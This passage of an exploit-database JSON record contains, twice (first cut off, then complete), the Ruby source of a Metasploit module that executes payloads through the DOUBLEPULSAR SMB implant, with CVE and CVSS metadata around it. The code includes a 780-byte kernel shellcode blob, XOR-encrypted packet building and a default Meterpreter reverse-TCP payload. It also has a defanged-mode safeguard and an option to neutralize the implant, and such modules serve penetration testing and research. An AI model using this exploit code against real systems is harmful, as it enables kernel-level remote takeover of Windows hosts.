pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-29] #"}, "lastseen": "2021-10-28T22:16:57", "differentElements": ["sourceData"], "edition": 58}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "90f0fe2a63f7d9bf4699ef0688f82d67", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-29T22:19:20", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-29T22:19:20", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-29T22:19:20", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n 